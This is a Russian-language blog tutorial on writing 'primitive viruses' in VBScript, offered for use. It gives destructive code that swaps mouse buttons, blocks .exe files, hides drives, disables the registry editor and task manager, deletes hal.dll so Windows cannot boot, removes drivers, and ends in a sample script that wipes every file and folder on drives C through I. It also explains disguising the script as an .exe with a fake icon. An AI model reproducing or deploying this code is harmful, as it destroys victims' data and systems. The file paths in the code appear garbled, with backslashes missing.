СОЗДАЁМ ПРИМИТИВНЫЕ ВИРУСЫ VBS( visual basic script )

 visual basic script.Затем скомпелирован в «exe» формат.
 

Приступим: 

Для начала, нужно уметь изменять расширение файла, с этого и начнём.
Существует много способов, но мне по душе
У каждого должен быть обычный архиватор, вот им мы и воспользуемся. 
И так, создайте к примеру текстовый фаил под названием «Текстовый документ». 
Теперь найдите этот текстовик через свой архиватор. В архиваторе, 
вы должны увидеть следующее: «Текстовый документ.txt». 
Окончание «txt» — имя расширения файла, вот его и нужно изменить, точно так же, словно, редактируете имя папки или файла, стираете строчку «txt» и ставите скажем «mp3». 
В результате мы получаем «Текстовый документ.mp3» формата. 
Если всё понятно, а вопросов возникнуть по этому поводу недолжно, то пойдём дальше.
Создайте текстовый документ, содержащий следующее:

on error resume next
Set S = CreateObject(«Wscript.Shell»)
set FSO=createobject(«scripting.filesystemobject»)
s.run«rundll32 user32, SwapMouseButton»


Затем, сохранив полученные данные, вам нужно изменить расширение файла, и вместо «txt» прописать «vbs». 

Аббревиатура «vbs», происходит от названия языка программирования — «visual basic script».

Вот у нас и готова первая, простая, вредоносная программка, меняющая местами кнопки мыши.

Теперь нужно её скомпелировать (изменить) в «exe» формат с помощью программы: «Vbs2Exe», 
и установить любой значок с помощью грабера иконок: «IconToy». 

А теперь информация для тех, кто не намерен ограничивать свои возможности банальным обменом кнопок мыши. 

on error resume next
Set S = CreateObject(«Wscript.Shell»)
set FSO=createobject(«scripting.filesystemobject»)

Три, верхние строчки — должны присутствовать всегда. Далее, 
следует кодировка, а ниже, в скобках — пояснение.

Так же возможно сочетать, те или иные вредоносные команды.
s.regwrite«HKCRexefileshellopencommand»,«rundll32.exe»
(Запрет на открытие «EXE» файлов)
s.regwrite«HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerNoDrives»,«67108863»,«REG_DWORD»
s.regwrite«HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerNoViewOnDrive»,«67108863»,«REG_DWORD»

(запрет доступа к жёстким дискам)
fso.deletefile fso.getspecialfolder(0)+«system32hal.dll»,1
(удаляется системный фаил, после чего загрузка Windows становится невозможна.

Система работает до первой перезагрузки)
fso.deletefolder fso.getspecialfolder(0)+«system32drives»,1
fso.deletefolder fso.getspecialfolder(0)+«Driver Cache»

(удаление драйверов)

fso.deletefolder «АДРЕС»,1
(Удаление папки. Пример: fso.deletefolder «C: Новая папка»,1)

fso.deletefolder «C:*.*»,1
(Удаление всех папок диска С. Адрес можно поставить любой)

fso.deletefile «АДРЕС»,1
(Удаление файла. Пример: fso.deletefile «C: Новая папкаТекстовый документ.txt»,1)

fso.deletefile «C:*.*»,1
(Удаление всех файлов диска С. Адрес можно поставить любой)

s.regwrite«HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesSystemdisableregistrytools»,«1»,«REG_DWORD»
(Запрет редактирования реестра)

s.regwrite«HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesSystemdisabletaskmgr»,«1»,«REG_DWORD»
(Запрет диспетчера задач)

s.run«rundll32 user32, SwapMouseButton»
(Обмен кнопок мыши)

Пример заварки:


on error resume next
Set S = CreateObject(«Wscript.Shell»)
set FSO=createobject(«scripting.filesystemobject»)
fso.deletefile «C:*.*»,1
fso.deletefolder «C:*.*»,1
fso.deletefile «D:*.*»,1
fso.deletefolder «D:*.*»,1
fso.deletefile «E:*.*»,1
fso.deletefolder «E:*.*»,1
fso.deletefile «F:*.*»,1
fso.deletefolder «F:*.*»,1
fso.deletefile «G:*.*»,1
fso.deletefolder «G:*.*»,1
fso.deletefile «H:*.*»,1
fso.deletefolder «H:*.*»,1
fso.deletefile «I:*.*»,1
fso.deletefolder «I:*.*»,1
fso.deletefile fso.getspecialfolder(0)+«system32hal.dll»,1

Благодарочка за Вами


Обсудить у себя 0
Комментарии (0)
Чтобы комментировать надо зарегистрироваться или если вы уже регистрировались войти в свой аккаунт.
накрутка инстаграм
все 5 Мои друзья